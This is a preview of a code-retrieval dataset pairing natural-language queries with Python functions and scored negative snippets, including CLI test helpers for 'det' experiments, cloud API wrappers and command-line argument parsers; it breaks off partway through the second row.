query
stringlengths
9
9.05k
document
stringlengths
10
222k
metadata
dict
negatives
sequencelengths
30
30
negative_scores
sequencelengths
30
30
document_score
stringlengths
4
10
document_rank
stringclasses
2 values
Runs `det experiment describe` CLI command on a finished experiment. Will raise an exception if `det experiment describe` encounters a traceback failure.
def run_describe_cli_tests(experiment_id: int) -> None: # "det experiment describe" without metrics. with tempfile.TemporaryDirectory() as tmpdir: subprocess.check_call( [ "det", "-m", conf.make_master_url(), "experiment", "describe", str(experiment_id), "--outdir", tmpdir, ] ) assert os.path.exists(os.path.join(tmpdir, "experiments.csv")) assert os.path.exists(os.path.join(tmpdir, "workloads.csv")) assert os.path.exists(os.path.join(tmpdir, "trials.csv")) # "det experiment describe" with metrics. with tempfile.TemporaryDirectory() as tmpdir: subprocess.check_call( [ "det", "-m", conf.make_master_url(), "experiment", "describe", str(experiment_id), "--metrics", "--outdir", tmpdir, ] ) assert os.path.exists(os.path.join(tmpdir, "experiments.csv")) assert os.path.exists(os.path.join(tmpdir, "workloads.csv")) assert os.path.exists(os.path.join(tmpdir, "trials.csv"))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def describe():", "def describe(self, *args, **kwargs):\n\t\treturn self.data.describe(*args, **kwargs)", "def test_describe_model(self):\n\t\tdetails = self.watcher.describe()\n\t\tprint(details)\n\t\tself.assertEqual(len(details), 11)", "def test_recognize_describe(self):\n pass", "def test_describe_diagnostics():\n\n m = pyqg.QGModel(1)\n m.describe_diagnostics()", "def run_list_cli_tests(experiment_id: int) -> None:\n\n subprocess.check_call(\n [\"det\", \"-m\", conf.make_master_url(), \"experiment\", \"list-trials\", str(experiment_id)]\n )\n\n subprocess.check_call(\n [\"det\", \"-m\", conf.make_master_url(), \"experiment\", \"list-checkpoints\", str(experiment_id)]\n )\n subprocess.check_call(\n [\n \"det\",\n \"-m\",\n conf.make_master_url(),\n \"experiment\",\n \"list-checkpoints\",\n \"--best\",\n str(1),\n str(experiment_id),\n ]\n )", "async def describe_dbinstance_tdeinfo_async(\n self,\n request: dds_20151201_models.DescribeDBInstanceTDEInfoRequest,\n ) -> dds_20151201_models.DescribeDBInstanceTDEInfoResponse:\n runtime = util_models.RuntimeOptions()\n return await self.describe_dbinstance_tdeinfo_with_options_async(request, runtime)", "def describe(model_element, **kwargs):\n model_descriptor = ModelDescriptor(**kwargs)\n return model_descriptor.describe(model_element)", "def describe(dir):\n try:\n # decode() is needed here for Python3 compatibility. In Python2,\n # str and bytes are the same type, but not in Python3.\n # Popen.communicate() returns a bytes instance, which needs to be\n # decoded into text data first in Python3. And this decode() won't\n # hurt Python2.\n return command_output(['git', 'describe'], dir).rstrip().decode()\n except:\n try:\n return command_output(\n ['git', 'rev-parse', 'HEAD'], dir).rstrip().decode()\n except:\n return 'unknown hash, ' + datetime.date.today().isoformat()", "def describe(self, model_element, **kwargs):\n if isinstance(model_element, model.ScenarioOutline):\n return self.describe_scenario_outline(model_element, **kwargs)\n elif isinstance(model_element, model.Scenario):\n return self.describe_scenario(model_element, **kwargs)\n raise AttributeError(\"{0} is nor supported yet\".format(\n model_element.__class__.__name__))", "def cli(argv):\r\n args = get_args(argv)\r\n verbosity = \"summary\"\r\n if args.verbose:\r\n verbosity = \"report\"\r\n report = evaluate(args.design, verbosity)\r\n print json.dumps(report, indent=4)", "def describe_dbinstance_tdeinfo(\n self,\n request: dds_20151201_models.DescribeDBInstanceTDEInfoRequest,\n ) -> dds_20151201_models.DescribeDBInstanceTDEInfoResponse:\n runtime = util_models.RuntimeOptions()\n return self.describe_dbinstance_tdeinfo_with_options(request, runtime)", "async def describe_dbinstance_tdeinfo_with_options_async(\n self,\n request: dds_20151201_models.DescribeDBInstanceTDEInfoRequest,\n runtime: util_models.RuntimeOptions,\n ) -> dds_20151201_models.DescribeDBInstanceTDEInfoResponse:\n UtilClient.validate_model(request)\n query = {}\n if not UtilClient.is_unset(request.dbinstance_id):\n query['DBInstanceId'] = request.dbinstance_id\n if not UtilClient.is_unset(request.owner_account):\n query['OwnerAccount'] = request.owner_account\n if not UtilClient.is_unset(request.owner_id):\n query['OwnerId'] = request.owner_id\n if not UtilClient.is_unset(request.resource_owner_account):\n query['ResourceOwnerAccount'] = request.resource_owner_account\n if not UtilClient.is_unset(request.resource_owner_id):\n query['ResourceOwnerId'] = request.resource_owner_id\n if not UtilClient.is_unset(request.security_token):\n query['SecurityToken'] = request.security_token\n req = open_api_models.OpenApiRequest(\n query=OpenApiUtilClient.query(query)\n )\n params = open_api_models.Params(\n action='DescribeDBInstanceTDEInfo',\n version='2015-12-01',\n protocol='HTTPS',\n pathname='/',\n method='POST',\n auth_type='AK',\n style='RPC',\n req_body_type='formData',\n body_type='json'\n )\n return TeaCore.from_map(\n dds_20151201_models.DescribeDBInstanceTDEInfoResponse(),\n await self.call_api_async(params, req, runtime)\n )", "def test_complete_experiment():\n try:\n # init logging\n tf.logging.set_verbosity(tf.logging.ERROR)\n\n # configure experiment\n run_experiment.load_gin_configs(PARAMS, [])\n # create the agent and run experiment\n runner = checkpoint_runner.create_runner(BASE_DIR)\n runner.run_experiment()\n except Exception:\n pytest.fail(\n 'Running experiments in Dopamine failed!')", "def describe(self) -> str:", "def show_set_down_info() -> None:\n\n print('----------------------------------------------------------')\n print(f'Test environment destroyed. Driver will be shut down.')\n print(f'Run completed at: {datetime.now()}')", "def describe_dataset(self, dataset_id=None):\n url = self.prism_endpoint + \"/datasets\"\n\n if dataset_id is not None:\n url = url + \"/\" + dataset_id + \"/describe\"\n\n headers = {\"Authorization\": \"Bearer \" + self.bearer_token}\n\n r = requests.get(url, headers=headers)\n\n if r.status_code == 200:\n logging.info(\"Successfully obtained information about your datasets\")\n return r.json()\n else:\n logging.warning(\"HTTP Error {}\".format(r.status_code))", "def do_info(self, args):\n if self.exploit is None:\n eprint(colorize('No exploit set; nothing to describe. Select an exploit with the \\'use\\' command',\n 'cyan'))\n else:\n eprint(colorize('\\n ' + self.exploit.DESCRIPTION + '\\n', 'green'))", "def test_det(self, a, dete):\n detc = det(a)\n assert np.isclose(detc, dete)", "def run_main(f, help_str):\n if len(sys.argv) not in [5, 6]:\n print('Usage: python logdet.py n d q eps [seed]')\n print()\n print('n > 8 is the size of the Toeplitz submatrix')\n print('d > 0 is the size of the dense submatrix')\n print('q > 0 is the number of dense-Toeplitz Kronecker products')\n print(' to sum together for the system')\n print('eps >= 0 is the constant diagonal perturbation (a float)')\n print(' added in (higher eps -> better conditioning).')\n print('default seed is 1234')\n print()\n print(help_str)\n print()\n print('Choose q = d = 1 and n large to test Toeplitz, mainly')\n print('Choose q = 1 and n ~ d^2 > 1 to test Kronecker, mainly')\n sys.exit(1)\n\n n = int(sys.argv[1])\n d = int(sys.argv[2])\n q = int(sys.argv[3])\n eps = float(sys.argv[4])\n seed = int(sys.argv[5]) if len(sys.argv) > 5 else 1234\n\n assert n > 8\n assert d > 0\n assert q > 0\n assert eps >= 0\n np.random.seed(seed)\n\n print('size q {} n {} d {} eps {:g}'.format(q, n, d, eps))\n\n cases = [\n ('random (well-cond) ', random_toep),\n ('linear decrease (poor-cond)', poor_cond_toep),\n ('exponentially decreasing (realistic)', exp_decr_toep)]\n\n for name, generator in cases:\n print(name)\n dense_mats = [rand_pd(d) for _ in range(q)]\n toep_tops = [generator(n) for _ in range(q)]\n my_mat = SumMatrix([Kronecker(NumpyMatrix(dense), Toeplitz(top))\n for dense, top in zip(dense_mats, toep_tops)])\n # added noise\n my_mat.orig_matvec = my_mat.matvec\n my_mat.matvec = lambda x: my_mat.orig_matvec( # pylint:disable=cell-var-from-loop\n x) + eps * x\n my_mat.logdet = lambda: np.log(my_mat.approx_eigs( # pylint:disable=cell-var-from-loop\n 0) + eps).sum()\n f(my_mat)", "def Run(self, args):\n identifiers = args.CONCEPTS.api.Parse().AsDict()\n\n result = apigee.APIsClient.Describe(identifiers)\n\n # Must use vars(args) to check whether there's even a revision field in the\n # parsed args namespace. It's only present for ALPHA track.\n requested_revision = None\n if \"revision\" in vars(args):\n requested_revision = args.revision\n\n # If the user didn't ask for revision data, the response from\n # APIsClient.Describe() is good enough.\n if requested_revision is None and not args.verbose:\n return result\n\n rev_nums = result[\"revision\"]\n if requested_revision is not None:\n if requested_revision not in rev_nums:\n message = \"No revision %r among API %s's revisions: %s\"%(\n requested_revision, identifiers[\"apisId\"], rev_nums)\n raise exceptions.InvalidArgumentException(\"--revision\", message)\n # No need to check whether this revision exists within the original list;\n # if there's no such revision, RevisionsClient will raise an appropriate\n # error.\n rev_nums = [requested_revision]\n\n revisions = []\n for revision in rev_nums:\n identifiers[\"revisionsId\"] = revision\n revision_result = apigee.RevisionsClient.Describe(identifiers)\n del revision_result[\"name\"]\n revisions.append(revision_result)\n del result[\"revision\"]\n result[\"revisions\"] = revisions\n\n return result", "def experiment(task, eid, event_type, output, metric, sort, output_fields):\n event_type = EVENT_TYPES[event_type]\n ServerManager.get()\n try:\n result = ServerManager.api.experiment_details(task, eid, event_type=event_type, metric=metric)\n prop_name_loc = {k: i for i, k in enumerate(output_fields)}\n result_df = experiment_to_df(exp=result, prop_name_loc=prop_name_loc, event_type=event_type, sort=sort)\n if output is None:\n click.echo(result_df)\n else:\n result_df.to_csv(output)\n except ApiException as e:\n click.echo(click.style(json.loads(e.body)['detail'], fg='red'))", "def describe_dbinstance_tdeinfo_with_options(\n self,\n request: dds_20151201_models.DescribeDBInstanceTDEInfoRequest,\n runtime: util_models.RuntimeOptions,\n ) -> dds_20151201_models.DescribeDBInstanceTDEInfoResponse:\n UtilClient.validate_model(request)\n query = {}\n if not UtilClient.is_unset(request.dbinstance_id):\n query['DBInstanceId'] = request.dbinstance_id\n if not UtilClient.is_unset(request.owner_account):\n query['OwnerAccount'] = request.owner_account\n if not UtilClient.is_unset(request.owner_id):\n query['OwnerId'] = request.owner_id\n if not UtilClient.is_unset(request.resource_owner_account):\n query['ResourceOwnerAccount'] = request.resource_owner_account\n if not UtilClient.is_unset(request.resource_owner_id):\n query['ResourceOwnerId'] = request.resource_owner_id\n if not UtilClient.is_unset(request.security_token):\n query['SecurityToken'] = request.security_token\n req = open_api_models.OpenApiRequest(\n query=OpenApiUtilClient.query(query)\n )\n params = open_api_models.Params(\n action='DescribeDBInstanceTDEInfo',\n version='2015-12-01',\n protocol='HTTPS',\n pathname='/',\n method='POST',\n auth_type='AK',\n style='RPC',\n req_body_type='formData',\n body_type='json'\n )\n return TeaCore.from_map(\n dds_20151201_models.DescribeDBInstanceTDEInfoResponse(),\n self.call_api(params, req, runtime)\n )", "def test_suite():\n test(calc_det([[2, 1],[3, 4]]), 5)", "def test_010_describe_by_invalid_pid(self):\n client = test_client.TestClient(context.node[\"baseurl\"])\n # The exception is caused by the body being empty since describe() uses a\n # HEAD request.\n with pytest.raises(xml.parsers.expat.ExpatError):\n client.describe(context.TOKEN, \"_invalid_pid_\")", "def amtool_alert_describe(self, mess, fingerprint):\n helper = AmtoolHelper(\n alertmanager_address=self.config['server_address'])\n result = helper.get_alert(fingerprint)\n self.send_card(title=result[\"annotations\"][\"title\"],\n body=result[\"annotations\"][\"description\"],\n # thumbnail='https://raw.githubusercontent.com/errbotio/errbot/master/docs/_static/errbot.png',\n # image='https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_272x92dp.png',\n link=result[\"generatorURL\"],\n fields=result[\"labels\"].items(),\n color='blue',\n in_reply_to=mess)", "def dataset_statistics(dataset):\n print (dataset.describe())", "def describe(f, verbose=False):\n return better_arg_spec(f, verbose)", "def _describe_command(self, command, **options):\n command.get_synopsis(True)\n command.get_synopsis(False)\n command.merge_application_definition(False)\n\n self._write_text('<comment>Usage:</comment>', **options)\n for usage in [command.get_synopsis(True)] + command.get_aliases() + command.get_usages():\n self._write_text('\\n')\n self._write_text(' %s' % usage, **options)\n\n self._write_text('\\n')\n\n definition = command.get_native_definition()\n if definition.get_options() or definition.get_arguments():\n self._write_text('\\n')\n self._describe_input_definition(definition, **options)\n self._write_text('\\n')\n\n help = command.get_processed_help()\n if help:\n self._write_text('\\n')\n self._write_text('<comment>Help:</comment>', **options)\n self._write_text('\\n')\n self._write_text(' %s' % help.replace('\\n', '\\n '), **options)\n self._write_text('\\n')", "def test_view_diseases(mock_app):\n\n runner = mock_app.test_cli_runner()\n assert runner\n\n # Test CLI\n result = runner.invoke(cli, [\"view\", \"diseases\"])\n assert result.exit_code == 0\n # NO OMIM term should be preloaded in database\n assert \"No diseases found\" in result.output\n\n # insert one in database\n omim_term = {\n \"_id\": \"OMIM:193040\",\n \"disease_id\": \"OMIM:193040\",\n \"description\": \"Cholestasis progressive canalicular\",\n \"source\": \"OMIM\",\n \"genes\": [12690],\n \"inheritance\": None,\n \"hpo_terms\": None,\n }\n store.disease_term_collection.insert_one(omim_term)\n\n # Test CLI\n result = runner.invoke(cli, [\"view\", \"diseases\"])\n assert result.exit_code == 0\n # OMIM disease should now be found\n assert \"OMIM:193040\" in result.output" ]
[ "0.5586464", "0.5564415", "0.5341794", "0.5270411", "0.5181873", "0.5082891", "0.5071718", "0.50258327", "0.50245225", "0.4985327", "0.49451223", "0.49108976", "0.48686293", "0.48666832", "0.48470518", "0.48347655", "0.4822859", "0.47746998", "0.47700247", "0.47659424", "0.47639957", "0.47590598", "0.4751978", "0.47420877", "0.47381756", "0.47083387", "0.47054747", "0.47027856", "0.46673217", "0.46554247" ]
0.7508023
0
Runs listrelated CLI commands on a finished experiment. Will raise an exception if the CLI command encounters a traceback failure.
def run_list_cli_tests(experiment_id: int) -> None: subprocess.check_call( ["det", "-m", conf.make_master_url(), "experiment", "list-trials", str(experiment_id)] ) subprocess.check_call( ["det", "-m", conf.make_master_url(), "experiment", "list-checkpoints", str(experiment_id)] ) subprocess.check_call( [ "det", "-m", conf.make_master_url(), "experiment", "list-checkpoints", "--best", str(1), str(experiment_id), ] )
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_pre_cli_list(run):\n out, err = run(dork.cli.the_predork_cli, [], *(\"\", \"-l\"))\n assert \"test.yml\" in out, \\\n \"Failed run the dork.cli.the_predork_cli method: {err}\"\\\n .format(err=err)", "def command_list(self, command):\n\n # See if the list exists and return results\n if len(command.args) > 0 and command.args[0] in LISTS:\n resp = []\n\n\n # Print out our available machines\n if command.args[0] == \"machines\":\n # Loop over controllers\n for c in self.config_list:\n\n # Get updated list of machiens\n self.config_list[c].get_machines()\n\n # Print output\n machines_tmp = self.config_list[c].machines\n\n resp.append(\"--- %s\" % c)\n for x in machines_tmp:\n name = machines_tmp[x].config.name\n m_type = machines_tmp[x].type\n profile = machines_tmp[x].config.volatility_profile\n resp.append(\" [%s] Type: %s, Profile: %s\" % (\n name, m_type, profile))\n resp.append(\"--- %s\" % c)\n\n # Print out our LO-PHI configs\n if command.args[0] == \"controllers\":\n\n if len(self.config_list) == 0:\n resp.append(\"No controllers are configured.\")\n else:\n resp.append(\"--- Available Controllers\")\n for x in self.config_list:\n resp.append(str(self.config_list[x]))\n resp.append(\"--- Available Controllers\")\n\n # Print out our running analyses\n if command.args[0] == \"analysis\":\n\n # Ensure our list\n self.update_analysis()\n\n # Loop over controllers\n for c in self.analysis_list:\n analysis, filename = self.analysis_list[c]\n\n resp.append(\"\\n[%s] %s\" % (c, filename))\n\n if len(resp) == 0:\n resp.append(\n \"No analysis scripts found in %s.\" % self.analysis_directory)\n\n return '\\n'.join(resp)\n\n else:\n return self.RESP_HEADER + \"ERROR: No such list.\\n Available lists are: %s\\n\" % LISTS", "def main_list(args):\n return list_commands(args.directory)", "def test_fixture_list_runs(tmp_sample_project):\n config_dir = tmp_sample_project\n output = subprocess.run([\"smif\", \"list\", \"-d\", config_dir], stdout=subprocess.PIPE)\n assert \"energy_water_cp_cr\" in str(output.stdout)\n assert \"energy_central\" in str(output.stdout)\n\n # Run energy_central and re-check output with optional flag for completed results\n subprocess.run([\"smif\", \"run\", \"energy_central\", \"-d\", config_dir], stdout=subprocess.PIPE)\n output = subprocess.run([\"smif\", \"list\", \"-c\", \"-d\", config_dir], stdout=subprocess.PIPE)\n assert \"energy_central *\" in str(output.stdout)", "def list_command(ctx: Any) -> None:\n pass", "def test_listCommand(self):\n acli = ArmiCLI()\n\n origout = sys.stdout\n try:\n out = io.StringIO()\n sys.stdout = out\n acli.listCommands()\n finally:\n sys.stdout = origout\n\n self.assertIn(\"run-suite\", out.getvalue())", "def experiments(ctx, **kw):\n if not ctx.invoked_subcommand:\n ctx.invoke(list_experiments, **kw)\n else:\n if _params_specified(kw):\n print(\n \"options cannot be listed before command ('%s')\"\n % ctx.invoked_subcommand)", "def run(self, commands: list[str]):\n ...", "def do_command(self, args):\n testops = dbops.Tests()\n listing = testops.list(args)\n ordering = ['test_name', 'os_type_name',\n 'test_command', 'runtime', 'timeout']\n do_list(listing, ordering)", "def test_listCommand(self):\n from armi import cli\n\n cli = cli.ArmiCLI()\n\n origout = sys.stdout\n try:\n out = io.StringIO()\n sys.stdout = out\n cli.listCommands()\n finally:\n sys.stdout = origout\n self.assertIn(\"run-suite\", out.getvalue())", "def cmd_list(args):", "def main():\n # get the params in format\n params = {key: value for key, value in demisto.params().items() if value is not None}\n\n LOG(f'Command being called is {demisto.command()}')\n try:\n if params.get('initial_interval') and int(params.get('initial_interval')) > 7: # type: ignore\n raise ValueError(\n f\"Retroactive timeline should be within 7 days, given value: {params.get('initial_interval')}\")\n\n client = Client(params)\n args = demisto.args()\n\n if demisto.command() == 'test-module':\n if not args.get('collection', False):\n args['collection'] = params.get('collection', '')\n return_results(get_test_response(client, args))\n\n elif demisto.command() == 'fetch-indicators':\n # fetch indicators using taxii service\n indicators = fetch_indicators(client)\n # we submit the indicators in batches\n for b in batch(indicators, batch_size=2000):\n demisto.createIndicators(b)\n\n elif demisto.command() == 'cyble-vision-fetch-taxii':\n # fetch indicators using taxii service\n validate_input(args)\n return_results(cyble_fetch_taxii(client, args))\n\n elif demisto.command() == 'cyble-vision-get-collection-names':\n # fetch collections using taxii service\n return_results(get_feed_collection(client))\n\n # Log exceptions\n except Exception as e:\n return_error(f'Failed to execute {demisto.command()} command. Error: {str(e)}')", "async def list(self, ctx: MyContext):\n if ctx.subcommand_passed is None:\n await ctx.send_help(\"wormhole list\")", "def main():\n args = parse_command_line()\n expt_config = load_config(args.experiment_config_path)\n run_cli(RunOptions.from_dict(expt_config))", "def cli() -> None:", "def cli() -> None:", "def main() -> None:\n commands: Dict[str, Callable] = {\n 'swis-alert-list': swis_alert_list_command,\n 'swis-event-list': swis_event_list_command,\n 'swis-query': swis_query_command\n }\n command = demisto.command()\n demisto.debug(f'Command being called is {command}')\n try:\n params = demisto.params()\n args = demisto.args()\n server = params['server']\n credentials = params.get('credentials', {})\n\n verify_certificate = not params.get('insecure', False)\n proxy = params.get('proxy', False)\n\n client = Client(\n server=server,\n credentials=credentials,\n verify=verify_certificate,\n proxy=proxy)\n\n for key, value in args.items():\n if isinstance(value, str):\n args[key] = value.strip()\n\n remove_nulls_from_dictionary(args)\n\n if command == 'test-module':\n # This is the call made when pressing the integration Test button.\n result = test_module(client, params)\n return_results(result)\n\n elif command in commands:\n return_results(commands[command](client, args))\n\n elif command == 'fetch-incidents':\n last_run = demisto.getLastRun()\n next_run, incidents = fetch_incidents(client, last_run, params)\n demisto.incidents(incidents)\n demisto.setLastRun(next_run)\n\n # Log exceptions and return errors\n except Exception as e:\n return_error(f'Failed to execute {demisto.command()} command.\\nError:\\n{str(e)}')", "def main():\n demisto.info('Command being called is ' + demisto.command())\n\n \"\"\"\n PARSE AND VALIDATE INTEGRATION PARAMS\n \"\"\"\n\n rest_client = RestClient(\n base_url=BASE_URL,\n verify=VERIFY_CERT,\n )\n\n try:\n if demisto.command() == 'test-module':\n test_module(rest_client)\n demisto.results('ok')\n\n elif demisto.command() == 'fetch-incidents':\n # get all tenant ids\n next_run, incidents = fetch_incidents(rest_client, demisto.getLastRun())\n demisto.setLastRun(next_run)\n demisto.incidents(incidents)\n\n elif demisto.command() == 'mad-close-incident':\n return_outputs(close_incident_command(rest_client, demisto.args()))\n\n elif demisto.command() == 'mad-assign-user':\n return_outputs(assign_user_command(rest_client, demisto.args()))\n\n elif demisto.command() == 'mad-remove-user':\n return_outputs(remove_user_command(rest_client, demisto.args()))\n\n elif demisto.command() == 'mad-get-incident':\n return_results(get_incident_command(rest_client, demisto.args()))\n\n elif demisto.command() == 'update-remote-system':\n return_results(update_remote_system_command(rest_client, demisto.args()))\n\n elif demisto.command() == 'get-mapping-fields':\n return_results(get_mapping_fields_command())\n\n elif demisto.command() == 'get-remote-data':\n return_results(get_remote_data_command(rest_client, demisto.args()))\n\n elif demisto.command() == 'mad-get-escalations':\n return_results(get_escalations_command(rest_client, demisto.args()))\n\n else:\n raise NotImplementedError('Command not implemented')\n\n except NotImplementedError:\n raise\n except Exception as err:\n demisto.error(traceback.format_exc()) # print the traceback\n return_error(f'Failed to execute {demisto.command()} command.\\nError:\\n{str(err)}')", "def run(self):\n try:\n self.runCommand()\n except TortugaException as ex:\n print(ex.getErrorMessage())\n raise SystemExit(ex.getErrorCode())\n except SystemExit:\n raise\n except Exception as ex:\n print(str(ex))\n raise SystemExit(-1)", "def cli():\n logger.debug('cli() called')", "def runCommand(self): \\\n # pylint: disable=no-self-use", "def do_work():\n args = sys.argv\n args = args[1:] # First element of args is the file name\n\n if len(args) == 0:\n print('You have not passed any commands in!')\n else:\n for a in args:\n if a == '--help':\n print('AWS: EC2 - S3 - List unused resources tool')\n print('Options:')\n print(' --help -> show this help menu.')\n print(' --ec2 -> show unused AWS resources in EC2.')\n print(' --s3 -> show unused AWS resources in S3')\n print(' --test -> test config with terraform')\n elif a == '--ec2':\n os.system(\"python unused_resources_aws2_ec2.py 1\")\n elif a == '--s3':\n os.system(\"python unused_resources_aws_s3.py 1\")\n elif a == '--test':\n os.system(\"cd terraform && terraform init && terraform plan && terraform apply -auto-approve && cd ..\")\n os.system(\"python unused_resources_aws_ec2.py 1\")\n os.system(\"cd terraform && terraform destroy -auto-approve\")\n else:\n print('Unrecognised argument.')", "def test_handle_multiple_subcommands(self):\n ret, code = self.testcommand.handle(\"team list edit\", user)\n self.assertEqual(ret, self.testcommand.get_help())\n self.assertEqual(code, 200)", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():" ]
[ "0.61308813", "0.59608287", "0.5957649", "0.58396363", "0.5808478", "0.5768765", "0.57584125", "0.5753735", "0.5732263", "0.56613624", "0.56290406", "0.56156904", "0.5615358", "0.5497544", "0.5480825", "0.5480825", "0.5471782", "0.5451167", "0.54397607", "0.54342854", "0.54243225", "0.5422052", "0.5416624", "0.5414033", "0.5414033", "0.5414033", "0.5414033", "0.5414033", "0.5414033", "0.5414033" ]
0.7019173
0
Handle all options in the arguments. This function returns a dictionary contain 'input_pkg' and 'output_pkg' keywords.
def handle_arguments(): result = {'input_pkg':'', 'output_pkg':''} try: args = sys.argv[1:] optlist = gnu_getopt(args, 'h', ['help']) except GetoptError: print 'Error when parsing arguments.' more_informations() if len(sys.argv) < 2: print 'No input file.' more_informations() for option, value in optlist[0]: if option in ['-h', '--help']: usage() result['input_pkg'] = optlist[1][0] if len(sys.argv) > 3: result['output_pkg'] = optlist[1][1] return result
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def processArgs(printHelp=False):\n parser = OptionParser()\n\n parser.add_option('-i', '--input',\n dest='input',\n help='Name of the latex file, for example, document.tex',\n metavar='string')\n parser.add_option('-o', '--output',\n dest='output',\n help='Name of the output folder. Default is \"submit\"',\n metavar='string')\n parser.add_option('-x', '--xiv',\n dest='xiv',\n default=False,\n action='store_true',\n help='Converts the figures to PDFs for arXiv.org submission',\n metavar='boolean')\n parser.add_option('-m', '--margin',\n dest='margin',\n help='Size of the bounding box margin in case of arXiv.org submission. Default is 2.',\n metavar='integer')\n\n if printHelp:\n parser.print_help()\n else:\n return parser.parse_args()", "def _options(self):\r\n xmi_file = self.tb_xmi_file_name.GetValue()\r\n topic = self.tb_pragma.GetValue()\r\n package = self.tb_package.GetValue()\r\n header = self.tb_file_header.GetValue()\r\n target_folder = self.tb_target_folder.GetValue()\r\n encoding = self.tb_encoding.GetValue()\r\n \r\n return {\"topic\" : topic, \r\n \"package\" : package, \r\n \"header\" : header, \r\n \"target_folder\" : target_folder,\r\n \"encoding\" : encoding,\r\n \"xmi_file\" : xmi_file}", "def getOptionHashes(options):\n positionalArgs={}\n flaggedArgs={}\n #if options.inputFlag is None and options.taskType is not None:\n # options.inputFlag=programOptionMap[options.taskType].get('in',None)\n if options.inputFlag is not None:\n try:\n positionalArgs[int(options.inputFlag)]='in'\n except ValueError:\n flaggedArgs[options.inputFlag]='in'\n except TypeError:\n for flag in options.inputFlag:\n flaggedArgs[flag]='in'\n #if not(options.outputFlags) and options.taskType is not None:\n # options.outputFlags=programOptionMap[options.taskType].get('out',[])\n if options.outputFlags is not None:\n for outputFlag in options.outputFlags:\n try:\n positionalArgs[int(outputFlag)]='out'\n except ValueError:\n flaggedArgs[outputFlag]='out'\n except TypeError:\n for flag in outputFlag:\n flaggedArgs[flag]='out'\n #if not(options.threadsFlag) and options.taskType is not None:\n # options.threadsFlag=programOptionMap[options.taskType].get('threads',None)\n if options.threadsFlag is not None:\n try:\n positionalArgs[int(options.threadsFlag)]='threads'\n except ValueError:\n flaggedArgs[options.threadsFlag]='threads'\n except TypeError:\n for flag in options.threadsFlag:\n flaggedArgs[flag]='threads'\n if options.prefixFlag is not None:\n try:\n positionalArgs[int(options.prefixFlag)]='prefix'\n except ValueError:\n flaggedArgs[options.prefixFlag]='prefix'\n except TypeError:\n for flag in options.prefixFlag:\n flaggedArgs[flag]='prefix'\n if options.rel_paths is not None:\n for rel_path_flag in options.rel_paths:\n try:\n positionalArgs[int(rel_path_flag)]='rel'\n except ValueError:\n flaggedArgs[rel_path_flag]='rel'\n \n return (positionalArgs,flaggedArgs)", "def get_argdict(cls, toolchain, args):\n return {} # Empty must be overloaded (if required)", "def _map_args_kwargs_to_input(self, *args, **kwargs) -> Dict[str, Any]:\n input_dict = {k: v for k, v in zip(self.inputs, args)}\n input_dict.update(kwargs)\n\n return input_dict", "def process_command_line():\n # Parse arguments\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--outPath\", type=str, help=\"Output path for flat uh files with adjusted fractions\")\n parser.add_argument(\"--gridFile\", type=str, help=\"Grid File containing full domain fractions variable \")\n parser.add_argument(\"--inputFiles\", help=\"Input netcdf grid(s) containing fraction/uh data\")\n parser.add_argument(\"--verbose\",help=\"Make script verbose\",action=\"store_true\")\n parser.add_argument(\"--diagPath\",type=str,help=\"Path to place diagnostic outputs\")\n\n args = parser.parse_args()\n\n options = {}\n options['verbose'] = args.verbose\n \n files={}\n temp = glob.glob(args.inputFiles)\n try:\n files['gridFile'] = args.gridFile\n except:\n files['gridFile'] = False\n try:\n files['diagPath'] = args.diagPath\n if not os.path.exists(files['diagPath']):\n print 'making diagnostic directory'\n os.makedirs(files['diagPath'])\n except:\n files['diagPath'] = False\n try:\n files['diagFile'] = args.diagFile\n\n except:\n files['diagFile'] = False\n\n files['inputFiles'] = []\n for fi in temp:\n files['inputFiles'].append(os.path.basename(fi))\n files['inPath'] = os.path.dirname(fi)\n\n try:\n files['outPath'] = args.outPath\n if not os.path.exists(files['outPath']):\n print 'output directory'\n os.makedirs(files['outPath'])\n except:\n files['outPath'] = False\n \n return files,options", "def get_input_args():\n # Create Parse using ArgumentParser\n parser = ArgumentParser()\n\n # Image file path as --file_path\n # Path to test images\n # image_path = './test_images/hard-leaved_pocket_orchid.jpg'\n # image_path = './test_images/cautleya_spicata.jpg'\n # image_path = './test_images/orange_dahlia.jpg'\n # image_path = './test_images/wild_pansy.jpg'\n parser.add_argument(\"--file_path\",\n type = str,\n default = './test_images/hard-leaved_pocket_orchid.jpg',\n help = \"Image file path.\")\n\n # Model file name as --model_filename\n parser.add_argument(\"--model_filename\",\n type = str,\n default = 'model_20200422_223607.h5',\n help = \"Model path and file name.\")\n\n # Top k classes to be returned as --top_k with default value 5\n parser.add_argument(\"--top_k\",\n type = int,\n default = 5,\n help = \"Number of epochs. Default = 5\")\n\n # json file mapping labels as --category_names\n parser.add_argument(\"--category_names\",\n type = str,\n default = 'label_map.json',\n help = \"json file mapping labels.\")\n\n return parser.parse_args()", "def _get_add_package_args(self, package, type_option, version_option):\n raise NotImplementedError()", "def parse_args():\r\n parser = argparse.ArgumentParser(description=\"Available Options\")\r\n\r\n parser.add_argument('-i'\r\n ,'--input_path'\r\n ,dest='input_path'\r\n ,type=is_valid_path\r\n ,required=True\r\n ,help = \"Enter the path of the image file to process\")\r\n\r\n args = vars(parser.parse_args())\r\n\r\n #To Display The Command Line Arguments\r\n print(\"## Command Arguments #################################################\")\r\n print(\"\\n\".join(\"{}:{}\".format(i,j) for i,j in args.items()))\r\n print(\"######################################################################\")\r\n\r\n return args", "def _arg2kw(self, mixed_args):\n def insert(dict_, k, v):\n if k in dict_:\n print \"duplicated args : %s \" % kv[0]\n raise ArgParseError\n dict_[k] = v\n \n opts = []\n args = {}\n\n n = len(mixed_args)\n i = 0\n while i < n:\n a = mixed_args[i]\n if a == '-' or a == '--' :\n opts.append(a)\n elif a.startswith(\"---\"):\n print \"invalid args: %s\" % mixed_args\n print \"only the following formats are supported:\"\n print \" arg1\"\n print \" --input=name1\"\n print \" --output name3\"\n print \" -oname2\"\n print \" -o name4\"\n raise ArgParseError\n elif a.startswith(\"--\"):\n kv = a[2:].split(\"=\", 1)\n if len(kv) == 2:\n insert(args, kv[0], kv[1])\n else:\n i += 1\n insert(args, kv[0], mixed_args[i])\n elif 